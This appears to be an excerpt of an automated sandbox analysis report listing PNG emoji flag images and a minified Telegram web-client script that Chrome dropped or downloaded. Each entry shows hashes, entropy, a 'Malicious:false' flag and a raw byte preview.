                                  SHA-512:D9E2D1E67443393E0AD97EE1A6073865CD7FDA9C47E2A8AF36B18DA07D4E3E451F69BFA55BB43CCC9AEC31CF4D8CE8D78400B3A88E6DB91B8B2C6C0B9815BF07
                                  Malicious:false
                                  Reputation:low
                                  Preview:(()=>{"use strict";var e,t,n,o,r={4875:(e,t,n)=>{n.d(t,{px:()=>M,eZ:()=>N,Ar:()=>F,PH:()=>O,Hn:()=>x,Ru:()=>k,eu:()=>L,iB:()=>P,fj:()=>T});var o=n(1481),r=n(1182),a=n(9705),s=n(4487),d=n(4235),i=n(7836),c=n(2393);const u=150,l=5e3,f=new Set(["destroy"]);let h;const m=new Map,p=new Map;let g=[];const y={chats:{},users:{},documents:{},stickerSets:{},photos:{},webDocuments:{},commonBoxState:{},channelPtsById:{}};let b=!0;(0,s.wr)((e=>{b=e}));const v=c.bs?new BroadcastChannel(o.rLF):void 0,w=(0,i.Fe)((()=>{const e=g;g=[],h?.postMessage({payloads:e})}));function C(e){g.push(e),w()}let A,S=[],E=[],I=!1;function k(e,t){return A=e,b?(h||(o.Oig&&console.log(">>> START LOAD WORKER"),h=new Worker(new URL(n.p+n.u(3559),n.b)),function(e){h?.addEventListener("message",(t=>{if("redirect"===t.data)return void window.location.replace("/telegram/index.html");const{data:n}=t;n?.payloads.forEach((t=>{if("updates"===t.type){let n;if(o.Oig&&(n=performance.now()),t.updates.forEach(e),o.Oig){const e=performan
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4129
                                  Entropy (8bit):7.842262826873734
                                  Encrypted:false
                                  SSDEEP:96:IbL0aeMSF3x/olHO9aOH2BziowrzGhTutcj3zt1H/v:lxwYWBzi9nGlcA51fv
                                  MD5:A17642DE80AE709F8EF58A288FCE997A
                                  SHA1:3F12E92E714C3733E5BEC05BA2B5C940DDD3EEDC
                                  SHA-256:2396EBB41C39C9BAD47D9D64FD57D991E48310BA8644BDD1FCD3827C9382337F
                                  SHA-512:7EDF93B60169592BE4491F217CD2D9DD9A2A491843A8EADB25FEEBFE52A0B065B94687F51007498381549C12330838A7C55207ADAC6E8CC2EF6DA4682F12E38C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLy"..usv...nlt...wut...vtu...jg......./*.zxu...b`.tqu......WT....0,.omu...ywu...MJ.qnu...zxu...qnt...zxz" n...xv.lj.GD.............................................................................................................................................................................................................}y..|....ql....zx.nj.vt.sq.`[.nl.rp.jg.fc.mk._[.a^.d`.YU.fc.UQ.PK.YU.ge.QL.[X._\.b_.LH.ID.HC.HC.NJ.RM.HC.GB.GB.YV.ID.GB.FA.E@.C=.[Y.E@.D?.QM.C>.E@.WT.C>.HC.A<.>9.?:.?:.QM.GC.@<.=8.KH.82.<7.;6.:5.>:.71.94.2-.?;.72.B>.72.50.83.-'.4/.:6./*.2-.3..95.4/.0+.)#.0+.3/..).*%.-(.4/.74.-(.+&.*%.-).*%.2.."..(#.)$.51.'".*%.'".-(.&!.0,.$..41.$ .#..$.....".."..#..&".-*. ..,)....'#. ..+(....)&.......# .(%."........$!...~%"z ..........u..u.....l..........tRNS....#17DGVYcccegnyx~~~......................................................................................................................................1&....5IDATx....n$Y^...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4161
                                  Entropy (8bit):7.904318181820394
                                  Encrypted:false
                                  SSDEEP:96:tLhoahmE8P27SBenKJpz/EiJZAWyLFr4/xWgHr:t9ogmE8PxxDEoyLFr4/xHL
                                  MD5:9CCE96440206C81DF2D7411DAF897481
                                  SHA1:85BEB1FE03CA0148A15478CF9E96E18921A85F01
                                  SHA-256:58544FABF399B60F55EEFF3782A04A36E733C64F2035FBC9DE6F2AF4966699D2
                                  SHA-512:9020D879714CEB0888EC08E5DD1B6821D4F690247B6DA8C96B4C8A4DBF3F16A27D70E7AEABCDAF23ED26FE260A81F998DD90E61FE3DE2946AEA3D5A36531F931
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL:^T.;0k...=1k...>3l...;/h..t...<0.<1n...<0[.ur..#UG.G;q...8,6eXZ.tm.."N@.>/h...B7.6*h..u..k..Dma.=2p..^.x.;0m...@5s...7+i...B7.6+o..9dX.B6u...6+b.{.5*q..t..p..l..h..g..a.._.~Y.}d.}Z.{.L"R.z.T.^.x.G..\7.V0.P).L$.P).O(R.w.O(.G..O(.b?.O(.I!.M%K.v.N&.N'.K#Z.u.M&.eD.L%Q.s.K#F.s.O)lw\.J#|pS.jKJ.r.I".Z6.B.S}q[{a.H!A.p.G .D..G!.F.=.nG~lNzm.E.fqV@.k0.p.:..C..N)8.l8.k%.t0.m7.j.A...v.F .;.Exh.X5'.p5.j.=.5~i.?.3~hPrY5|g3}g..r}^?;xfGrd%.l1|fcgK0{e>td1zd/ycSjO0xb1vb-xb#|g-wa..m,w`2t_,v`6q_+u_,t^>k])t^.}i.q\)s]#u`1n[(r\&r\'q[.xd'pZ.lY%pZ(nY%oY.t`%nY)lX#nX$mX,iV"mW$lV"mV%jV#kU!lU kU.dT%hU!jT.jT iT&fR hS.iS&eQ.hR.gQ.fQ)`P.eP.fP.eO.dN.aN%^M.cM.bL%[K.bK._K.aK.`K.`J._I"XH.\H.^I.^H.]G!VF.]F"UF.\G.[E.[E.ZE!SD.XD.QB.UB.SA.N?.R>.Q>.I<.K<.N<.E9.I8.B6.F6.A4.?3.A2.@2.</.>0.9,.6*.2&|M.....4tRNS......$-19;?KQWXbcdihlny}~...........................w,t....IDATx...Yn.V......D.e%..te.Dw.5t..V_..M..mY..T.............=..{....................4_7..V(.JI...>F.'._.&..ic2...9..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3572
                                  Entropy (8bit):7.873139104664729
                                  Encrypted:false
                                  SSDEEP:48:hO0e4IziGg7Dl8oOfP2lpqSrE9dxQtCQfRHeiIvihcuhLM0eES4uGRt4GGJVFgPM:w0kBg3l8ffOlpmvL23laNG0NAx3Mhuar
                                  MD5:DD8AAED25D1771472F89334305696D2A
                                  SHA1:3D5661BD3EBB16C8048E2B66364F4730944FADDB
                                  SHA-256:173B1545814F9FCE55BBDB6473AAF20B3D914128CE5946D0234A2CEC9D97B55F
                                  SHA-512:40EAA039E5AAF7D12B83B7395069BC1164AF29E168A7701E72D80FB423A4195098453A918A0D10258030F5EB528F5AC712EEB199AC762D7911423DFCF0815011
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1ec.png
                                  Preview:.PNG........IHDR.....................PLTEGpLe.ux......I1k...E.`.~p...A*l...D+...a......E....b..E.h3y].A*.dE.Y=....?'...d..P.s....@(b...L/.cI......b...B*...<x_f...@(...].}....E-...g...B*...`...E-......e......D-.../nU........^.}.@)..............................................................................................................................................................j.....e....._.....[.}>.z\.{=.xK.w=.wP.wU.wG.rP.r@.q0.oC.n/.l4.kE.l3.i6.h..c).e6.d..b=~d..a*.a..`.._.._.._..^..^..]..\&.]..\..\*~]..[..[..Z5v\..Z#~Z..X..Y..X..X..W..W..W..W..W..U,uX..U..T.{V..T..U..T.~T.}S..S..S..S.wT.~R..R%rT.zR.~Q+nS.}Q.|P.}P.vQ.|O.{N.xO.zN.zM.yL.xL.uL.wK.wJ.qK.vJ.mK.uI.vI.kJ.tH.sH.tF.oH.sG.rG.rE.qF.pE.qE.fF.pD.oC.dD.nC.cD.lB.bC.eA.i@.g?.^@._=.b;.`;.Z;.V<.]9.R8.Y6.W5.S4.O4.L2.O0.I0.L..J-.F-.D*.A(.=%j......wtRNS......."&,47:<?FSUUUTccddghnyx.~.........................................................................................q....,IDATx...M..D.....*W..zF.A .9._K...8...0l..[..b.I..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4257
                                  Entropy (8bit):7.815859775305513
                                  Encrypted:false
                                  SSDEEP:96:vkMUUWHOqtnyau0OgsgsL7KA+anUSNcdidW1p1SMvo:vkMHmmKsLqR8Wxg
                                  MD5:A6229519B3A10EB0BAB9BCF35FA87E7B
                                  SHA1:8D6003957109A2267ADE71A24F337582846A8938
                                  SHA-256:F1B2B894F4BD6D4B2E9751E9C7A84ED909C8EA66806742C8B759DF24EB09CCB9
                                  SHA-512:2FB9E111A07E4FBD3F3E05ABA9A34525F3EAF9BCE0F2EAD15A8F216A050D155F6B6DC6223D54AA3EB07E85C372FE7833A537F63BBE5C0D3AED50D4B5A49ECE43
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f6-1f1e6.png
                                  Preview:.PNG........IHDR.....................PLTEGpL._i...J.*.^i...oxO!/...D.$.t.E.%ttt.kv...F.&|||.r}sssD.%.v...._&6.irF.&.t.zFU>..sss...K.,..........v..muI.*uuu.p|F.'...pkm....t..kv.v..w..r}....TbI.*xxx....kv...u.I.)vvv...r~F.'...s~I.).......................................................................................................................................................................................................................}........r..u..s~~~~.nzzzz.jx.guuuu.br.fs.co.\n.^k.Wj.[h.]h.Qe.Te.Xe.Mb.O_.H^.E\.K[.CYnRZ.@W.>W.>W.>V.=V.=V.DV.=U.<T.<T.;T.<T.>T.;S.:S.:R.9R.9Q.:Q.?R.8PxBR.8P.7O.9P.7O.6N.5N.8N.9M.4L.6L.3K.2Kt:L.1I.1I|4I.0H..G.,Ew1F~-D.+D.*Bs/B.(A}(Az)@w*@|'?{&>l-@r*>y&>u%<f,=x#<j(<u":v!:a)9t.8r 8i$8r.6o.6q.5`%7p.4g.4n.4n.2^!3m.1l.1V#2l.0k.0j./d./Y..O .].+L.*T.'G.%E.!=...s.[....tRNS........%$.2:>BBDJMQ[abgimrty{|~...................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3941
                                  Entropy (8bit):7.862144332099234
                                  Encrypted:false
                                  SSDEEP:96:ktnfNwlFnPWY/fvKfbh3OT+/ZkkiwgdXX3AodnvvhET1pK8o:ENwPvyteqhkkiLASvvheXK8o
                                  MD5:0BAA4FC5E09DD1168A54262BAE9E3B99
                                  SHA1:926D2F10BB8D053DCEC7FAA453DC06322401C86B
                                  SHA-256:6B12499C7A84F6CFA8816F98DE3F63B54F82ABF3CDFFF8D43B4E1B1FB115ADAC
                                  SHA-512:426634C15A0FDCB4909D362FE187129A99C30B311C0D0814714D258772B2920A3E0244C19BA8B037B6CEB0ABA2022D723FBE812BA0729237D25C76A2652E7F4E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1e9.png
                                  Preview:.PNG........IHDR.....................PLTEGpLR4:.p}....gt....iw....bp....r..ft....iw.@T....... 4.p}....es....A..Z3.hu.9.....r..bq....o|.bp....s..lz....gu....m{......G]D.r..Ma.cr...................................................................................................................................................w.t......w..f{.q.....m{.WsW.p.iw.cs.^p.ds.Xl.`n.Sh.Xj.Lduuu.Zi.Mc.Uf.F^.B].M`.Pa.=X.AX.J].8Tiii.4Q.3Q.5R.AW0.O.2P.3Pfff.1O.7Q.0N.CU./M.-L.<R.-K..L.6O.+I^`Z.*H.(F.+H..H.1I.&D. B.}?.$B.$B."@YVR.(CyI?.5C.y;. ?..=..:..;.v9..<.$?..;. <.u6.{3.l=..9..8)f4.r4.!;.p3..62]4.o1.h0..4..6JJJ..4..4.!7.r+.m.JL..k/<Q-..1..0.j,.i,....h*.....4CCC.f)..4.e(..,.d'..+.c'.b&.a%.`$._#.\#..!:::..(....Y ....S..Q..K..I.....B..?.&&&.:.%%%###!!! ......................................................S..h.../tRNS.......%)37:GTUaccehv{~.........................*......IDATx...ko..}...9s].....l.J...X)ZWN....4m.j."..zA.>QZ......m..~.i....Yn.W.S..K..%ww.....rf9.r..Ed.`.3..r...9..!.p.c8.Y.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4367
                                  Entropy (8bit):7.9339578192229645
                                  Encrypted:false
                                  SSDEEP:96:3965HMPQ27qyQkwL6sQjJbAXMDczpFBgqG2tkC+/QXo9:t65HMPvZsQjtIEcxgqd+4Y9
                                  MD5:DD1CFFDEE6E1A164FF44403D55389362
                                  SHA1:1A8CF2A3BCB54E148751BB1A81FA332387C3E8FE
                                  SHA-256:4AC04BECB9527E2D3117DD4746BEB5BEE6A2A5029FC30E19D3C4525C0296816A
                                  SHA-512:12442F81CD188F9E48D2748F50F7A4D41694C3F6AAE33ABCA2129B59878D122AC69F5849888930CAAD3633F627B7C6823F4D674C2930DE4912B8D0DBA74F862C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.Y\t...nqx. .rus..s...IM.ru. $.'-.%+t...9?.mpt....../1.rut...HKs...mpr...vyl...lo{."u...vy.XZ.ilz."m...BY........V..R.....W....T.Y...g.....q..e...h..[...}..n..w..v....o....h......Ti........|VZ........W.....L.{.vz..yY...rv>.e.nq}.R.hl.ko.cg.YY.gj.^b8.O|.{.RO.hkc...[a.`d.SV.be.n@.JJ.V\.A<.]p.[^.NV.QV.CD.a.km..PVSr..DH.FP.Mh.Uwhd..**8t.tdb.3C.88Ii.Ve..<E.y..DO9l.*q.*q.*p.*p..t.$r.)o.)o.eX..x..Ip)n.(n..t.&m.mRy&l..p..:n$k.%j..4A#j..,,.:K#i."i.5c.#h..%$!h..m.A\. g..%#LX..C].8?.i. f..e..('mIi.e..d..i..c..:R.b..(*.a..a..e.TLu.`..f..).._.2V.'Z..^..^..,3.]..b..\.:O..[.....Z..^..Y.-N..Y..&*.X... .&+.W..\..W.c9Y.V..U..T..T..$(#L..S..X..R.9Bp....R... .Q..#).T..P.....E..O.r)AE9a.N...!.M..M..M..!%N2W.L..L..N.....K..K.~ %....J.....I.....?t.H.{.!...y.....r..x..l..Q.h&...$tRNS....,8AQU\accglrx~.....................B....IDATx...;..E....<w.{.(DI.P "A.H...P...5hhih..h.[PRGB.CHGE...G...v..id[..m.\D.....~;.Y...................J.f.Rj...".H....TR[..y.TI..u
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5495
                                  Entropy (8bit):7.928801327016286
                                  Encrypted:false
                                  SSDEEP:96:FtzaLZ7VrBuAi/tiTVMl6h2YZrycxPNbip72KwmnMIHye0simAlyO2tw9toeF4eG:Ft2LbBa1iTil6h7tNnbQ7MqMIHB1E138
                                  MD5:B68FFC3AF189A90A17FFC0C56FDDBEF4
                                  SHA1:B211A92E76041830FE303079BE5031AD64E9073B
                                  SHA-256:54FE11EC536D8FBEBD0E66CC7C1B82B765093B5CEBE1CAADF9000CC1DC9FB4A1
                                  SHA-512:0DAB5FA3292A42DEBED4A44917E41A4BDA559D6808FBE9EF8A79959AC4C1F2EBF33F8098E481B30C04371C91D94A051A6EC5A9084982957379E461D3A4D1A328
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.wO..ed..g...m.pg..f....4.m..#..*.6if..p...z..!S.jf...oi...jg..d...oh...oi...t..Ga....b........5..3..0..4.....6....#..7..5..6..5..A..2..K..0../.....-..+..V..6..*.....E.....(..&.....^..%.y..5.."..I.....#..!...'.k...V...&.<...i........T.&...B....d...(...2......S.A...&.......T..1....n.......%..@..,........'t....5..c..!.rW.....Jp.[O...,i..q.[.nEA..}.,.y.]x.fzkuyEC}.`.?rz$.==.59.@F`r<ir!.IW.-:.3D.3COlq.0@.2By`,.Md?h..0A..?JmO.'3aXt[j$.?5.,=.N-X^S.-<=s+.)9.'7.-<8\.T]=jHk. *LR..$4.6F:[tEb0A[Y\Y..#3.(7&Y.../%U..Y.../.$2..,"R..R.u6P...IMJ..).O.%O.:T:.#0.N.M>g..&.L.)Li.L...(..$..%.I.?EF....I...).....!.G.]/N..*.E.....B..B.....C.}.(.@.26f.@.2<B....>... .<..;ux.!p.#.9..7..6k....9|.8..7..6..4.j..y...0..1}o.../{.(..+na...&a.... V...J...!tRNS....,2ADU_ccccg}~~..................*....IDATx...n.U....=...vL.@.".h.pG.Q.R#D.P h..h(R.(.2o@....*.......9...u6^;(...7...G.w.8..8........8..d.....%#p...-..#p.n.....K.s....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4448
                                  Entropy (8bit):7.933320119773005
                                  Encrypted:false
                                  SSDEEP:96:NtIwyA+oaRT0GQSLZT8h3PZXhFjIDmd+32l1:NtIwyBoETBx03BvbIg
                                  MD5:642FA4A3127FE0E3325DBBD5EBD94E45
                                  SHA1:3078EE85D6750D52950E5B75A671E5E29DF29F32
                                  SHA-256:A02FA7139B97C7127170FAEDA9C92364FF1317E3B5CC44FF2190C82383684A81
                                  SHA-512:E21881FB89BFB93F51913E4BEB7760E4FACDD4F920EEC823FB1F9DAA5023F709DCBAB2CF39CDC93D236A7DB560AA2380C952895662A5EA800BB8AD097052E1E9
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1fe.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.dk.0l....... -.Xjv...mt. _.=G.mu.nv.#U.$V.$V.#R.$V.$V.px..O.qy.ks.fm.bi.$V.%W.+].jr.ho.$V.nv..U.9A..PSa.......%U..3D$T........3C.......0........#.......M......!.<..>.#R. O..4D..(..&.4.&V..9..7..%6...."3.............../.J..-..H...*.......C..@...,.2..):.E..,=...........>./@.,a.'8.F."Q.....6u. 0.0A....@..............6.....&n....hq.......'\.*y..N.ow..^.,...S.1k.:.. +."c.>..aj.E.!J..\e.7G.O\.Va....1{.FT.............0..W`......@.#O..6D.@O.;J.......,m.NW.[e.....)....#W.MX.?K.CP.&5.2A.!0./=z..."/....6..>... .'8.;|.;..EO.,;.LY...../...t...4B..*.'6.#..5.}..j..Tr.......................FLL......er6<;jtj.........Hu....z......9..3>..........e(...Tbh.....Td6c.|...cn../...z......;^5....?..9I..._..].b6\...'.......R..........{].+..........M/............r.........%tRNS..bc~c.~.~.f9.-..E.... Uo..|.{...p~f.>.....IDATx...o.`..q;.G...R`.4.n...K......0Hn....I..M]\,..........G..{...(.4..../...>.y.,...b.X,...b.X,.g.S%M..".(JQ.4IR..'.a.._.ZM.,..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4699
                                  Entropy (8bit):7.930233092678589
                                  Encrypted:false
                                  SSDEEP:96:5iu4QgqCxhXhSJcAf/W8K2BDoJvxI4VVMHg37:wugqCxphSrDK0oPI4VVKg37
                                  MD5:DEC5CAB4B9E1C8DFECFA129D87594D8D
                                  SHA1:359D543B9DDAE4FF5B46AA4CF6CC062D30058EFC
                                  SHA-256:EABA36AE62DF681F3F7B92CF61EA08F60085A0F3299A9410B54247DBC47C867C
                                  SHA-512:E3261485F8E172E049C036C22EDD466FAB94C3BA3F2565907ED9DB0024998839B82C6D992048182AB4BBC0858B5270FFBEB08E34ACB6035C95371DE2B16AAB6C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1fe.png
                                  Preview:.PNG........IHDR.....................PLTEGpL>W'.dU....dd.O..P.|...\\.vv.ff.P..dd.P..@@.k.....ij.R.....Q..cc......}66r......bb.M..pp.S..ee.O....f33.Q..jj.L..aa.V..M.....kk.^^.M.w..wuu......................................................|~....~~....tt.jj.ss.zz.hh.dd.aa.]].``.ZZ.kk..%.TT.[[..$..$%.&.NN%.%.TT$.$$.$$.$.NN#.#.SS.GG!.!.ZZ1.,.......NN#.".GG....@@L.#.^^Y{$...:.! . .AA....II.QQ.99.......DD...mk".<<..........11.N$.<<....31...{Z..74.?9.......**.......&&.&&.&&.%%.!%....%%.00....++.$$.44.B=.%%.##.##..%....-,....""Dl..~..%&..$.!!. ....!!.......('.3/......0o........}..('.w................C^..........u::....z..~........m..q..##....v...........g................ZC..............m..b..........y(.....e........]..............Z...........a..W....................V........P.w.........J.....E.u.._..o....../tRNS.......017=DSSbcceehx{~~~~.............................IDATx...M..e....|&3....v.V.....=.J..XD.7..<.U.OB.J+x.D..."J.RY..A."....[.`D.fw....;..Mv25.lR.../......y................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4448
                                  Entropy (8bit):7.933320119773005
                                  Encrypted:false
                                  SSDEEP:96:NtIwyA+oaRT0GQSLZT8h3PZXhFjIDmd+32l1:NtIwyBoETBx03BvbIg
                                  MD5:642FA4A3127FE0E3325DBBD5EBD94E45
                                  SHA1:3078EE85D6750D52950E5B75A671E5E29DF29F32
                                  SHA-256:A02FA7139B97C7127170FAEDA9C92364FF1317E3B5CC44FF2190C82383684A81
                                  SHA-512:E21881FB89BFB93F51913E4BEB7760E4FACDD4F920EEC823FB1F9DAA5023F709DCBAB2CF39CDC93D236A7DB560AA2380C952895662A5EA800BB8AD097052E1E9
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.dk.0l....... -.Xjv...mt. _.=G.mu.nv.#U.$V.$V.#R.$V.$V.px..O.qy.ks.fm.bi.$V.%W.+].jr.ho.$V.nv..U.9A..PSa.......%U..3D$T........3C.......0........#.......M......!.<..>.#R. O..4D..(..&.4.&V..9..7..%6...."3.............../.J..-..H...*.......C..@...,.2..):.E..,=...........>./@.,a.'8.F."Q.....6u. 0.0A....@..............6.....&n....hq.......'\.*y..N.ow..^.,...S.1k.:.. +."c.>..aj.E.!J..\e.7G.O\.Va....1{.FT.............0..W`......@.#O..6D.@O.;J.......,m.NW.[e.....)....#W.MX.?K.CP.&5.2A.!0./=z..."/....6..>... .'8.;|.;..EO.,;.LY...../...t...4B..*.'6.#..5.}..j..Tr.......................FLL......er6<;jtj.........Hu....z......9..3>..........e(...Tbh.....Td6c.|...cn../...z......;^5....?..9I..._..].b6\...'.......R..........{].+..........M/............r.........%tRNS..bc~c.~.~.f9.-..E.... Uo..|.{...p~f.>.....IDATx...o.`..q;.G...R`.4.n...K......0Hn....I..M]\,..........G..{...(.4..../...>.y.,...b.X,...b.X,.g.S%M..".(JQ.4IR..'.a.._.ZM.,..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3998
                                  Entropy (8bit):7.921669068226218
                                  Encrypted:false
                                  SSDEEP:96:TbIvgOyLbY9vIMv073V8+ZAJuZS5NyNCQe68S5yWk/:woOyYRI407fZkXi0SI/
                                  MD5:B853DD0A4ED71757A3CE9CE4CF622EDB
                                  SHA1:F1B0861D2F43B25B55F72E5EEFEB0216E8C8D2E4
                                  SHA-256:4DA4847E5690833A90662E14D9D7292AD2C0AEA4DE70CAFF64F91192FAB0BF2E
                                  SHA-512:08115695931287D16E930A8963D0660A57C76FF3DF94CB9F949F48307FE0636E80FD28626A5B99B531546C675CD3CB68E3D5BD2B68F9651C86FF60F8EC5C18C0
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fc-1f1f8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.gts..xu..rss %sx..lnu.!.xzx}.t.!.tv.JLgl.q..|.../2.y{~#&o...prx!$.....K4:bsx.v ".qs.}.|..uz.u. MRwty..vxu.".egrv.s..z~..}.sx.x"$.uvn..|%'x}..}.\a.n..HNt.ln.......................z|....su.kn.ei.pr.]`.]`y~..TX.ce.IH.IJ.KPv{..KP.dg.KO.MR.JO.JO.JN.IM.HM.IM.RV.LU.Z].IM.GKqv..A>.FK.KT.EI.EJ.DH.Y\.FJ.CG.QTmr..CG.AEhp..DH.AE.@D.NU.>C.?C.GL.85.=Agl..AE.;?.<@ai..:>.?C.9=bh..9=.CH.7<.Jj.JL.1..=A.6:.6;[c..49.7;.6:.48.37.;?.59[a..26.6:.36.15{N~.*&./3.04T\..59..2.8<..2.-1.Gr..2.)(.,0H\..-1SZ..8<.*/..2.+/.)-.*.MV..=`./4.36UQ..(,.(,.'+.)-IS.JS..&).#..'*HR..37KS..%).$).%)>S.FP..(,.%)<Q.DN.]E|.)-2S.CM../2./2w9b.#&DL..*..2RAK.@J.=H..!$.,/<F.."%,J..%(9C.<Dw.),7A...!4?..&)4>|3=...!.&)^-Z1;~!@./9|59i...|!$-7z...+5x.9....v..)3u'1s.0b%/p.1{s..$.nM.>",k.+vl.. *f.'`.&U."o.$W..M.......5tRNS......%0399HSU_`bcgjpvy~~............................m.{.....IDATx.....U.....G..{.^ZKE......+7.. ...Hw..;.Z.w....7>.......z.5&..L...s..H.po)}l..2'....;..]]]]]]]]]]]]]]]]]].
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5163
                                  Entropy (8bit):7.830372906130133
                                  Encrypted:false
                                  SSDEEP:96:Ecp04Eplvw+WA5WEgh37SrhaVoZUpznSrfr5zvyiP2DmgNRD3VSDmWubu:t04ekNh3erhQVSrfpR2DNRlSSWuq
                                  MD5:B9BFCBBDDADB1AFA53895A69A15B16FD
                                  SHA1:4F1D4CF554CCFB18CFD42269636CD1430A617CCC
                                  SHA-256:D3E78C4229BBD62760F211DE2A354798130BE52560D950604195304137A29F75
                                  SHA-512:C737BE2CBF23AB5069F8D77A9C65C6D3B62D635504346CE06A5E3A8A5A08B0BA9B94B0892E379526C7CF69917E68ABE44010F6A8601777E13157E2442CE92349
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.L5.L4.N6.U9.[=._?.`>.^;.]:.Z8.Y6.W5.U3.T1.R0.Q..P..L..F,.@'ex(.P+&vSJhvfvh.O..W.......U..O..F.x.h`.N.hU..G..>..F-yT.nU..E..@..C..C..>..1..KL.G.aM.\H.YBw.0.U@._=.a?.dA.gD.hF.kH.lJ oL!pM#qO%sP&tR'uS(vS(wT)xU(wU.X.q..n..g...B..I..>.q..v..m..f..^..W..P}.Hy.Cv.;p.Jv.V}.`..i..`}.Tx.Gq.?l.7e./_.'\..........................................;z.0s.6..R4.I2 W=.aC#iI$nM!eF.\?.Q8.D..@,.=).9%.5!.0..,..4!.:-.<#.6$.6$.5#.6$.9'.9'.;).0..l.}c.na.lY.l[.zb..j..s.........$.!... .!.'.$.&.+.,./..1..5..8..9..=..>..A../.^)g..`...s..&..4..5..)..H..a.P.@.8.."......@Pr4.K76j5.Q;.,b#Gr.R|6[.@e.Gl.Qr.\x.g..n..p..Hf..j..n..=.i}..u..v..r..t..o..v..k..l..]x.Wr...m..J... f..m.=u.<t.;s.;r.8p.7n.5m.3k.2i./g.-e.,d.*b.)a.(_.%^.$\."Z.!X..V..T..R..P..O..M..I..D~.=r.8f.5b.6c=.F*....tRNS.c....................................................................................................................................+Eb...yt~.h.................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5083
                                  Entropy (8bit):7.925450917311208
                                  Encrypted:false
                                  SSDEEP:96:HRV+zh06S/WXDOxLGIQWQwR3RCH3I9ZfzxgvaHr2orXzwjvr0hgtgjpn:x0zhSwq9R8cVgSyBjEgk
                                  MD5:2A1E7D7C49698DF72D6F9C3B45E4127C
                                  SHA1:8412389795C2CB3D9E2E9A561FCBBB7A92EAE2D0
                                  SHA-256:E87923DC59C6115C3F0CC255C4C21658A84CC685DF47CE02E50B6071B69C2AFA
                                  SHA-512:156A1D4D838958D6E2B819183DEBB7A58EF14AB09121B92BC8A14DB9D6674FD21688CF410E80FAFFC62639A27069BF3145D7E8E50AEF33E20B9783788A1122C1
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLz.Bvp.c..vp3}q._..yh.g..zn.ym.StSr.....xm..WS...i..`..|p.x...$8.t.pd.g..ui..v.f..N.|yn.g..xl..w.wj.i..xGR.u.]..sg.............................q........J.....&..%..$..%..#.....$....;..#..#.. ........#...........J.............. ........X........#.....................................................................d.......|.......o....................t(h.........r....b.....~~.F..^..U..Z..P.....uw.F..uwt.~.J...Z%R..<...z..y.C.~nos.v..J:4..F}y.].-..~q.4.{&.~7|wffh%.}.+L$.|$.{9wswk.){u ~x.}v.*H]`a+vp.{t.225mj.yroc..&E'ql.wp[YY..A.H..tm."A.xo.oi.rk.&9.4G..>.ohSPR.ke.ri..<.mf..9.kd.f`..2;SU.ha..5..6._Z..6.e^..2JGD.%4..3.b[../._X..-.VQ..>..+.\V??4../..)..4.SL..&_%+s."..#..#33*|..w..)*0=.!g..&&&$$$"""9.. .K........>..... 